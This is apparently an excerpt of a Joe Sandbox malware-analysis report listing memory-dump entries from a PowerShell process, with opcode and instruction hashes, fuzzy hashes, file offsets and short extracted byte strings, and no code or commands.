                                                                  • Instruction ID: 9a6b740e51f05337293f2654af96b98efa31690ab31da1836abf43935e8a8379
                                                                  • Opcode Fuzzy Hash: 3d3f17ef17a2e7ae54a8bfd31ef70958af6565ab93b5386e7be0b048ca62dc7e
                                                                  • Instruction Fuzzy Hash: 29418975A002008FDB18DB74D958AAE7BBAAF8D300F045468E407EB7A5DB34AC81CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q
                                                                  • API String ID: 0-4171516541
                                                                  • Opcode ID: a993c2aa6e244991b096e7503b396665fd9f8121bf59901228bf1b1165edd1ba
                                                                  • Instruction ID: e0f04de19924516248ee51b3d2e67ebce19db488408f9d0f16ad22855c836680
                                                                  • Opcode Fuzzy Hash: a993c2aa6e244991b096e7503b396665fd9f8121bf59901228bf1b1165edd1ba
                                                                  • Instruction Fuzzy Hash: 0582CFB0B00219DFDB24CF68C951B6ABBB2BF95310F1484AAD909EB355DB35EC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-1355183119
                                                                  • Opcode ID: f89b35b0dfc9ba6aefa4e8ddf26a42fbd1e3804c2c2ada5664b091f58494eb0e
                                                                  • Instruction ID: 6ecf455ccbb4e9fc25bcc3727e6e1ee12f099864e347663a6487038e2c12fbc8
                                                                  • Opcode Fuzzy Hash: f89b35b0dfc9ba6aefa4e8ddf26a42fbd1e3804c2c2ada5664b091f58494eb0e
                                                                  • Instruction Fuzzy Hash: 5C3277B1B0420A9FCB258F69D45066ABBF2EF95310F1484BBD945CB291DB32DC41C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$84!l$84!l$tP]q$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-2960685831
                                                                  • Opcode ID: efedae7affe57ceda0cb708df4c9ed06a6cef7c7e1789db8a3211d19cabe63f7
                                                                  • Instruction ID: 32c51edf4590311a3021586f881a43e4a53ff6b947caa15fb468e5ce944ee876
                                                                  • Opcode Fuzzy Hash: efedae7affe57ceda0cb708df4c9ed06a6cef7c7e1789db8a3211d19cabe63f7
                                                                  • Instruction Fuzzy Hash: A9B1F5B160434ADFC7258F28D850AAABFB6BF96310F1984A7D844CF652CB35DC45C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-4110764221
                                                                  • Opcode ID: 958c1836ebbe2c572c3df4e5e1fcd00b0cf5679024aa069fb6e97650fea6af1d
                                                                  • Instruction ID: 6656b5062997e33448d8d0be979c7bea6f696960cc877d933371bebd9c9832dd
                                                                  • Opcode Fuzzy Hash: 958c1836ebbe2c572c3df4e5e1fcd00b0cf5679024aa069fb6e97650fea6af1d
                                                                  • Instruction Fuzzy Hash: 63923BB4A00218DFD724CB18C951F6ABBB2BB95314F14C0AAD909EB355DB36ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-471056614
                                                                  • Opcode ID: d57a43cd0c9447669f677a648fef05eaf55c8f4e077737586979ee15d64c365a
                                                                  • Instruction ID: 43800ee8bbaa1edadae4b81610be0874d7c133a65765db55a99c1dbb544b6a2c
                                                                  • Opcode Fuzzy Hash: d57a43cd0c9447669f677a648fef05eaf55c8f4e077737586979ee15d64c365a
                                                                  • Instruction Fuzzy Hash: B8D1AEB0A002189FCB14DF68C555BAEBBB2EF88714F14C469D805AF395CB76EC46CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2572727945
                                                                  • Opcode ID: 23f776d56564f81c3a5146e8202ceaf61dccdf61e03a2bbcf0efa5d31f69ea94
                                                                  • Instruction ID: eb1e33959287fa393ee8e83fd5e976df41bb3d542f4c1ed51919361c32ea16ec
                                                                  • Opcode Fuzzy Hash: 23f776d56564f81c3a5146e8202ceaf61dccdf61e03a2bbcf0efa5d31f69ea94
                                                                  • Instruction Fuzzy Hash: B1722CB4A00215DFD724CB18C981F6ABBB2BB95314F14C0AAD949EB351DB72ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4']q$4']q
                                                                  • API String ID: 0-2190086065
                                                                  • Opcode ID: cae12edd3b55c8a0ee9aa2f82e9c0f6077d53db846e2e630711696d994428088
                                                                  • Instruction ID: f1cb2bfc37c0f4e31d81510c2f7f63047b64eb48ab532f0992ebdbf022724cb3
                                                                  • Opcode Fuzzy Hash: cae12edd3b55c8a0ee9aa2f82e9c0f6077d53db846e2e630711696d994428088
                                                                  • Instruction Fuzzy Hash: A4F1B2B0B002189FD724DB68C951B6EBBB3EF94700F1084A5D909AF395DF76AD818F91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Haq$$]q$$]q
                                                                  • API String ID: 0-1533201563
                                                                  • Opcode ID: 87c0c83ae94c87d74b1b440e0a7f7f6da3e55ba039ba93bbbd4fac01b94cf956
                                                                  • Instruction ID: c5ff25cc33de266b4bf387c64ce86ded67ff8a156a0e5d55890f3590b2497519
                                                                  • Opcode Fuzzy Hash: 87c0c83ae94c87d74b1b440e0a7f7f6da3e55ba039ba93bbbd4fac01b94cf956
                                                                  • Instruction Fuzzy Hash: 9F123F34B002188FDB25EB24D8547AEB7B2BF89704F1544E9D40AAB361DF35AE81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$$]q
                                                                  • API String ID: 0-1444653880
                                                                  • Opcode ID: 6820880af59ffda732a7ba54e5234d36b4cd785f63d5cb3161fa484268ef502d
                                                                  • Instruction ID: 98aaea42e0ed22abe8bd2063a3276396530a82febb5fbbfb4e004979fe98c6fb
                                                                  • Opcode Fuzzy Hash: 6820880af59ffda732a7ba54e5234d36b4cd785f63d5cb3161fa484268ef502d
                                                                  • Instruction Fuzzy Hash: 93A16CF0B043199FCB159F38C86576ABBE2AFA1614F1484B6D905CF292DB35CC45C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q
                                                                  • API String ID: 0-705557208
                                                                  • Opcode ID: 8d20c878d2587d12bebf2b89b8c0047e178b37719315e23570e0ec266bb5f187
                                                                  • Instruction ID: ef690817467d67e41b602b4818e93a4551f8e98e6b1bbb7ef8f72be57841bd9a
                                                                  • Opcode Fuzzy Hash: 8d20c878d2587d12bebf2b89b8c0047e178b37719315e23570e0ec266bb5f187
                                                                  • Instruction Fuzzy Hash: 63A199B4A002089FCB14DF58C555BAEBBB2EF88714F14C429E804AF395CB76EC46CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l
                                                                  • API String ID: 0-2952237724
                                                                  • Opcode ID: 64ea1cf6bf3071dd5c3c3d4b4f9b476b18ca2d9c00340de992871723290e84cb
                                                                  • Instruction ID: a0790ce4b8fb1d08f6076406e7c723189c0409987783d5a4e29c914026d1c290
                                                                  • Opcode Fuzzy Hash: 64ea1cf6bf3071dd5c3c3d4b4f9b476b18ca2d9c00340de992871723290e84cb
                                                                  • Instruction Fuzzy Hash: 7C919FF0B10218AFC714DB68C551BAEBBE2EF98314F148465D909AF395CF76AC418BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l
                                                                  • API String ID: 0-4063606093
                                                                  • Opcode ID: 5c038693f45162539566353003b69b45c18f954ad5b6d5dcd2f2290e679142b0
                                                                  • Instruction ID: 90058fa4d46ebcd34a6a24c47056fa26d9c6251490ff5b0979e8e346e8977301
                                                                  • Opcode Fuzzy Hash: 5c038693f45162539566353003b69b45c18f954ad5b6d5dcd2f2290e679142b0
                                                                  • Instruction Fuzzy Hash: E7123DB4B00219DFD720CB18C951FA9BBB2FB95314F14C0A6D949AB351DB72ED818FA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l
                                                                  • API String ID: 0-4063606093
                                                                  • Opcode ID: 4077a243517ff61cc4ab231ae13f38d0e9933804b889b75826de79235f6cfcfd
                                                                  • Instruction ID: d35fc21e837bf111692a45b17ca11958c1f1dad94f7a94a2727cffcb3d139900
                                                                  • Opcode Fuzzy Hash: 4077a243517ff61cc4ab231ae13f38d0e9933804b889b75826de79235f6cfcfd
                                                                  • Instruction Fuzzy Hash: 249190F4B00254AFC714DB64C541BAEBBF2EF98314F148466E909AF395CB76AC41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q
                                                                  • API String ID: 0-1259897404
                                                                  • Opcode ID: 26a7f46944269d02e5967df46be1a32171a6260c57f3b151894e0de73db9c1fa
                                                                  • Instruction ID: dd82c164003cd3a0480b3ee66e631fcd214cbd8515aab9779774a6ae64401eed
                                                                  • Opcode Fuzzy Hash: 26a7f46944269d02e5967df46be1a32171a6260c57f3b151894e0de73db9c1fa
                                                                  • Instruction Fuzzy Hash: 9C41E5F0B04306DFCB248F24C595B6ABBE2AFA5714F1480A6D905DB291D736DD80C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37692a899f2ac3e6c9d296d7be635f60e1007437dc22f6b8ed3c28237cb6e656
                                                                  • Instruction ID: 4d73fe496e5b7f330585c32a2008f6f704cffa5742f574efb7cc458e88670d49
                                                                  • Opcode Fuzzy Hash: 37692a899f2ac3e6c9d296d7be635f60e1007437dc22f6b8ed3c28237cb6e656
                                                                  • Instruction Fuzzy Hash: 55B16F70E00609DFDF10CFA9C9857DEBBF1BF88319F148529D816AB254EB74A846CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b00fc5222a2b0a6e6b7eff4cde4b1f2faf48cbbd11b5def0705974b56ee059b4
                                                                  • Instruction ID: 2eb5e7655d1e3522c1a266c161ced039b4d885d5465ff92b0183c06346869a0d
                                                                  • Opcode Fuzzy Hash: b00fc5222a2b0a6e6b7eff4cde4b1f2faf48cbbd11b5def0705974b56ee059b4
                                                                  • Instruction Fuzzy Hash: C2A18175A00218DFDB14EFA4D948A9EBBB6FF88300F114558E406AF369DB74ED49CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aebad9f38ff91d136b1d39eeaf02cc53fd0e63916a2d6695957bfe115c52dfe1
                                                                  • Instruction ID: 1eef00f715255e752bfaf4bffa713a1e5741bfbf847c0db6c42dc414e0e8bd36
                                                                  • Opcode Fuzzy Hash: aebad9f38ff91d136b1d39eeaf02cc53fd0e63916a2d6695957bfe115c52dfe1
                                                                  • Instruction Fuzzy Hash: AFB14D70E00209DFDF10CFA9C9857DEBBF1BF48714F148529E816AB254EB74A885CB85
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 116b1e06aa6336a4ad5976f94360205e9282ad412b6687f461ded2fc361ca224
                                                                  • Instruction ID: 0446aded7983ef87de9da16ba6e46fa0b65bf93da727304808a41b4d86eeea3c
                                                                  • Opcode Fuzzy Hash: 116b1e06aa6336a4ad5976f94360205e9282ad412b6687f461ded2fc361ca224
                                                                  • Instruction Fuzzy Hash: 26918E34A012449FCB15EF78D8449ADBBF2FF89310F1885ADE4569B361CB39E886CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0027f8f660c4a93c1de544c0b305aec73ff1a41bb33f8da8fb93d8987598f33
                                                                  • Instruction ID: 00bb76bd35c7054d6e2cdc21522557a2228b16258820c907a8de0b23f40d0609
                                                                  • Opcode Fuzzy Hash: b0027f8f660c4a93c1de544c0b305aec73ff1a41bb33f8da8fb93d8987598f33
                                                                  • Instruction Fuzzy Hash: ED718F70A00249CFCB14DF68C880A9EBBFAFF89314F148969D416DB651DB75EC4ACB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64025fd5ae6fbc2e566d984176eae080e02f5e742ce981e1393939465327d627
                                                                  • Instruction ID: bb5f0037e47dd955fb19a5548c5e6d208107215d46ac1a233a7a1f5643566781
                                                                  • Opcode Fuzzy Hash: 64025fd5ae6fbc2e566d984176eae080e02f5e742ce981e1393939465327d627
                                                                  • Instruction Fuzzy Hash: 89713C74A00248DFDB14DFB4D584AAEBBBABF88304F148529D416AB250DB75AC8ACF51
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 706b127f0bff2f65868399f14a0f33487cf6f7cd3f8297e926674327a934a3e9
                                                                  • Instruction ID: 619bcda8d51c7a2508393cf4ad564e0b6d035b6a464125c0a24bb3734247c89e
                                                                  • Opcode Fuzzy Hash: 706b127f0bff2f65868399f14a0f33487cf6f7cd3f8297e926674327a934a3e9
                                                                  • Instruction Fuzzy Hash: 10716F70E00209DFEF14CFA9C9457DEBBF2BF88714F148529E516AB254EB74A842CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd91ff47cbe7c00407fd71b1c0d0a3c8960b7e911430026eae389632ac9036f2
                                                                  • Instruction ID: 091364c97ee10042f73a1416f396dd55596433391e8824bfd5189e3ff3ee5020
                                                                  • Opcode Fuzzy Hash: fd91ff47cbe7c00407fd71b1c0d0a3c8960b7e911430026eae389632ac9036f2
                                                                  • Instruction Fuzzy Hash: 72716E70E00249DFEF10CFA9D9857DEBBF1BF88714F148129E516A7254EB74A842CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebdc9bed26e1995af7e2f675a91cfcd89516610038e702df83c6f89dc72fc5dd
                                                                  • Instruction ID: c2f002f40178f9cdfc6e25eeffc6317fb60496cb7db4b960a853e31885409d8c
                                                                  • Opcode Fuzzy Hash: ebdc9bed26e1995af7e2f675a91cfcd89516610038e702df83c6f89dc72fc5dd
                                                                  • Instruction Fuzzy Hash: D7417AF17001649BCB185B7894195AEBFD39FE1214B24C8BAC901DF201CE32DD02C7A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a00efe32e6840219e5906c0d69ea43a51ff339c95d725029adf75e0a1b29d90f
                                                                  • Instruction ID: 6554d345348953f7ada9283272b5b47ff05e75d7a0f710f5c162888fae551f58
                                                                  • Opcode Fuzzy Hash: a00efe32e6840219e5906c0d69ea43a51ff339c95d725029adf75e0a1b29d90f
                                                                  • Instruction Fuzzy Hash: 02414070A00218DFDB28DFB5C58469EBBF6BF88310F148929D056AB6A4DB75A849CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bf0fcec597f2c000f6c949bcf4bdd455e25f837aa9d5dcc6656b91f25b42c92
                                                                  • Instruction ID: 0cee60c36033bb5b3ea7a6a61a41bf157a827fcdadce4e1e41560e21a24e868d
                                                                  • Opcode Fuzzy Hash: 6bf0fcec597f2c000f6c949bcf4bdd455e25f837aa9d5dcc6656b91f25b42c92
                                                                  • Instruction Fuzzy Hash: 7F31B2B4740214BBDB04A768C955BAEBBB3EF84710F148424E905AF395CF7AAC45CBE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27cca7a9c3055ebb955489545a2e8af5323deb236824c05b78c41cd3bc7bfe1a
                                                                  • Instruction ID: ca82ded39e486541aba250e76da7847626b72398f9bdd45dc4ebefcfd38aaed7
                                                                  • Opcode Fuzzy Hash: 27cca7a9c3055ebb955489545a2e8af5323deb236824c05b78c41cd3bc7bfe1a
                                                                  • Instruction Fuzzy Hash: 72218EB1314315ABC7245A79885073BB7C6ABD471AF108836D846DB281DE76CC41C370
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8dbaec0f74f1dca2b83a35db0e25c42000a86c66fdf4b7128b6d26fc67c262be
                                                                  • Instruction ID: 4817920fae48ed631d861b079fa1d82ca86fec9d3b8ae848134177a12b0e8e11
                                                                  • Opcode Fuzzy Hash: 8dbaec0f74f1dca2b83a35db0e25c42000a86c66fdf4b7128b6d26fc67c262be
                                                                  • Instruction Fuzzy Hash: 7C310B34B002188FCB25DB64C9556EEB7B2AF89304F1544E9D50AAB361DF36AE81CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e4d17632b523fdf221163978406ed655e36e0d5d2c2761889b77550fa3410ab6
                                                                  • Instruction ID: 42ce90a61a140ed1d50fe40e84fd3181397f481ffb4ff25ec97de27ff0e8034b
                                                                  • Opcode Fuzzy Hash: e4d17632b523fdf221163978406ed655e36e0d5d2c2761889b77550fa3410ab6
                                                                  • Instruction Fuzzy Hash: 0C316BB4A042458FCB05CF98C8909AABBF1FF49310B1585AAD849EB762C735AC41CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a94765234aad416ecc54cd718b12952a6903b3694f886d5ea711cc4a50ccb43
                                                                  • Instruction ID: 0538386ba697e398a6587c22c3246f82a3e1521985aea5120ff3b9644d9f7740
                                                                  • Opcode Fuzzy Hash: 2a94765234aad416ecc54cd718b12952a6903b3694f886d5ea711cc4a50ccb43
                                                                  • Instruction Fuzzy Hash: 3A216BB03083457BC7244E798890B76BFA5AF92714F188466D845DB2D3DA3ADC85C371
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bab48b1f9df9969a52610436a7205dff9121bc6ead209406d27a6602d549d0b9
                                                                  • Instruction ID: 84849c5f8896272af0b445b8812724de0b29afe421c13d64a5c4e2c182428710
                                                                  • Opcode Fuzzy Hash: bab48b1f9df9969a52610436a7205dff9121bc6ead209406d27a6602d549d0b9
                                                                  • Instruction Fuzzy Hash: E101F77630021AABE724996ED40067AB7DBDFE1222F14C43BD985C6251DA32CC45C7A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54f4cf5843d80ef0ffad084f3044718f23e974e6dc8f5d7fa96638569f477a16
                                                                  • Instruction ID: 6fe15672eabbbfa3891cfa5efd1ff102b175bf460ae02b003ea5ed647bb3680c
                                                                  • Opcode Fuzzy Hash: 54f4cf5843d80ef0ffad084f3044718f23e974e6dc8f5d7fa96638569f477a16
                                                                  • Instruction Fuzzy Hash: F611F830D05948DBEF24DB98D5887EEBB71AF4531FF141429C012BA190EB7468CACBA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48e4fa4eee118b299cbf6ab53d8b200af52794826634be989987ac2e76057e18
                                                                  • Instruction ID: f1f8bb09aa961ff5a4b206c83d96762448b500d14a01218a1f2106ae5d055e9a
                                                                  • Opcode Fuzzy Hash: 48e4fa4eee118b299cbf6ab53d8b200af52794826634be989987ac2e76057e18
                                                                  • Instruction Fuzzy Hash: 73014F78B402199FCB04DF98D490AADF7B1FF9E300B248659D95AAB361CA35EC03CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ad83c441f186bd3fa7ba5391dee79066966163a1e95b12c2b7dd51111cf6d2d
                                                                  • Instruction ID: 31a61abbf7bbf38030fa02958584228733c7e2b96248840d0bc502779b7cde79
                                                                  • Opcode Fuzzy Hash: 7ad83c441f186bd3fa7ba5391dee79066966163a1e95b12c2b7dd51111cf6d2d
